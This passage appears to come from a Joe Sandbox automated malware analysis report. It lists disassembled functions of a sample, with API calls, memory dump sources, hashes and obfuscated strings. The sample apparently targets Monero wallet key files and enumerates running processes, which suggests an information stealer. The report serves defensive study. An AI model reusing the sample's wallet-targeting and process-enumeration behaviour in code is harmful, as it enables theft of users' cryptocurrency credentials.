                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: f4aea7c74bdeeb0b618d8e89e8e2d20495c3ee9884640178f4485b8347e1e760
                  • Instruction ID: 45259d5a125357ceaff84ee5450ff006b15153493382f106bdac83b05b87521e
                  • Opcode Fuzzy Hash: f4aea7c74bdeeb0b618d8e89e8e2d20495c3ee9884640178f4485b8347e1e760
                  • Instruction Fuzzy Hash: C9011EB5A10208EBDB14DFA5CD98BEDBBFCEB48310F104188A90AA7240DB34AF40CF51
                  Function 00D67A93 Relevance: 6.7, Strings: 4, Instructions: 1687COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: (/k$7Jow$QF|{$VeM#
                  • API String ID: 0-3448816325
                  • Opcode ID: 843adc50051d39fbc33333e240417398aa273c9624d560d33fc334fd218f462f
                  • Instruction ID: 3927d9527dec7241dc13220988e72eff39340eee6278296929996f79534a78ee
                  • Opcode Fuzzy Hash: 843adc50051d39fbc33333e240417398aa273c9624d560d33fc334fd218f462f
                  • Instruction Fuzzy Hash: 23B206F3A0C6049FE3046E2DEC8567AFBE5EF94320F164A3DEAC583740EA7558058697
                  Function 00D629A4 Relevance: 6.6, Strings: 4, Instructions: 1602COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Mb:_$Rl~$}]}}${|
                  • API String ID: 0-729340950
                  • Opcode ID: e9f53ec84e5ddbbcb9da07a363bd0413acb832c1dd34d007d8e075314d99e95e
                  • Instruction ID: 1b9b90dac0622df60a6e281c43d8434a9aea38101f90652c7e099939fa121ace
                  • Opcode Fuzzy Hash: e9f53ec84e5ddbbcb9da07a363bd0413acb832c1dd34d007d8e075314d99e95e
                  • Instruction Fuzzy Hash: E4B206F3A0C6149FE304AE2DEC8567AFBE5EFD4320F1A453DEAC483744E63598058696
                  Function 00D5F442 Relevance: 6.5, Strings: 4, Instructions: 1530COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 26)$:ml?$Rrc{$ku{
                  • API String ID: 0-1337216423
                  • Opcode ID: 3951f19b08ee0e77c05053de92fb65698adc2ea7d902a9c72b71f219977f6df3
                  • Instruction ID: 8b513434836debaeeddfa1c5841f125797dd88a692e01fc069ad879ee26feb21
                  • Opcode Fuzzy Hash: 3951f19b08ee0e77c05053de92fb65698adc2ea7d902a9c72b71f219977f6df3
                  • Instruction Fuzzy Hash: 13A216F3A0C2149FE3046E6DEC8577AFBE9EF94620F1A453DEAC4C3744EA3558018696
                  Function 00D6145D Relevance: 6.1, Strings: 4, Instructions: 1130COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: &^$4^F$B1{y$Vhs.
                  • API String ID: 0-749318759
                  • Opcode ID: 6a0a24895745efab5070852a4ac574a440fb93368ff58768b7e8ef151e609534
                  • Instruction ID: a09fb433095bbc96353735042bd597f6c73fb32c7e3f45c12b58bbe95d946d4b
                  • Opcode Fuzzy Hash: 6a0a24895745efab5070852a4ac574a440fb93368ff58768b7e8ef151e609534
                  • Instruction Fuzzy Hash: 037239F36082049FE3046E2DEC4567AF7E9EF94720F1A893DE6C4C7744EA7598018696
                  Function 009B8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009C05B7), ref: 009B86CA
                  • Process32First.KERNEL32(?,00000128), ref: 009B86DE
                  • Process32Next.KERNEL32(?,00000128), ref: 009B86F3
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                  • CloseHandle.KERNEL32(?), ref: 009B8761
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                  • String ID:
                  • API String ID: 1066202413-0
                  • Opcode ID: 1406646baf0e196e08dabba138c6ddeb85d1362454d57d6bb18e74883e4585a8
                  • Instruction ID: 07c0ba80345c74de25197b26f21494453978d5c4e5e9f0bc3ae55457e426cf60
                  • Opcode Fuzzy Hash: 1406646baf0e196e08dabba138c6ddeb85d1362454d57d6bb18e74883e4585a8
                  • Instruction Fuzzy Hash: 99313971901218ABCB24DB94CD95FEEB77CEB89720F104199A10AA61A0DF346E45CFA2
                  Function 009B8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptBinaryToStringA.CRYPT32(00000000,009A5184,40000001,00000000,00000000,?,009A5184), ref: 009B8EC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptString
                  • String ID:
                  • API String ID: 80407269-0
                  • Opcode ID: dc246ab18c8903e6c698a251f70906b6f13b121082cc6952d9bc6c509dae14ed
                  • Instruction ID: dbe6e27d1c789fca109f22e78b60815beb107b5e9ecf321ac752fee4351487cc
                  • Opcode Fuzzy Hash: dc246ab18c8903e6c698a251f70906b6f13b121082cc6952d9bc6c509dae14ed
                  • Instruction Fuzzy Hash: 14110670200208BFDB00DFA4D988FBB37ADAF89320F109848F9198B250DB35E841DBA0
                  Function 009A9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                  Download Yara Rule
                  APIs
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009A4EEE,00000000,00000000), ref: 009A9AEF
                  • LocalAlloc.KERNEL32(00000040,?,?,?,009A4EEE,00000000,?), ref: 009A9B01
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009A4EEE,00000000,00000000), ref: 009A9B2A
                  • LocalFree.KERNEL32(?,?,?,?,009A4EEE,00000000,?), ref: 009A9B3F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptLocalString$AllocFree
                  • String ID:
                  • API String ID: 4291131564-0
                  • Opcode ID: 9571fda32eb9329b928e4f8fe7de5ae548073aff743323c2fc45d1eb4e3cb1b3
                  • Instruction ID: fa86a7a44824c1b0711598262a1b2d9aa695a328746438db46dfbe69bf907cea
                  • Opcode Fuzzy Hash: 9571fda32eb9329b928e4f8fe7de5ae548073aff743323c2fc45d1eb4e3cb1b3
                  • Instruction Fuzzy Hash: 6711A2B4240208EFEB10CF64DC95FAA77B9FB89701F208058F9159F390C7B6A941CBA0
                  Function 009B7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,009C0E00,00000000,?), ref: 009B79B0
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B79B7
                  • GetLocalTime.KERNEL32(?,?,?,?,?,009C0E00,00000000,?), ref: 009B79C4
                  • wsprintfA.USER32 ref: 009B79F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                  • String ID:
                  • API String ID: 377395780-0
                  • Opcode ID: 51fc27b13a8b94c369dda8aec49ae07e8e7880d9d19bcb539525f53ebb666d6b
                  • Instruction ID: 505fd295d0c93d1fc5d1a6eefa9228b4dd791d22f150a1ccd57eef382762e12b
                  • Opcode Fuzzy Hash: 51fc27b13a8b94c369dda8aec49ae07e8e7880d9d19bcb539525f53ebb666d6b
                  • Instruction Fuzzy Hash: 57112AB2904158ABCB14DFC9DD85BBEB7FCFB4CB11F10421AF605A2280E6395940C7B1
                  Function 009B7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,015EF2F8,00000000,?,009C0E10,00000000,?,00000000,00000000), ref: 009B7A63
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B7A6A
                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,015EF2F8,00000000,?,009C0E10,00000000,?,00000000,00000000,?), ref: 009B7A7D
                  • wsprintfA.USER32 ref: 009B7AB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                  • String ID:
                  • API String ID: 3317088062-0
                  • Opcode ID: ea71302b775b7cb7937bc432c18a5a6d42a2630cbaf6be8f6627633ba0833ec9
                  • Instruction ID: ccd9217b0debefe909030bb520046ba334565a64104ce0210b5aa42db7a5a706
                  • Opcode Fuzzy Hash: ea71302b775b7cb7937bc432c18a5a6d42a2630cbaf6be8f6627633ba0833ec9
                  • Instruction Fuzzy Hash: 63118EB1945228EFEB208F94DD49FA9BB7CFB44721F10479AE90A972C0DB746A40CF51
                  Function 00D66C0E Relevance: 5.6, Strings: 4, Instructions: 604COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: #Dif$:_V$=G[$f~}
                  • API String ID: 0-3080401173
                  • Opcode ID: 8f385e80e6ca75540ab7aa593cd569840db2e43e35df76c5d2777704abbcef9b
                  • Instruction ID: 62552cae61ee6dba1e2192805d95940c4f9901fcdf662e4e9c739d85467c1435
                  • Opcode Fuzzy Hash: 8f385e80e6ca75540ab7aa593cd569840db2e43e35df76c5d2777704abbcef9b
                  • Instruction Fuzzy Hash: 890239F360C2009FE308AE2DEC9567AFBE5EF94720F1A893DE6C5C7744E97598008656
                  Function 009B3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                  Download Yara Rule
                  APIs
                  • CoCreateInstance.COMBASE(009BE118,00000000,00000001,009BE108,00000000), ref: 009B3758
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 009B37B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
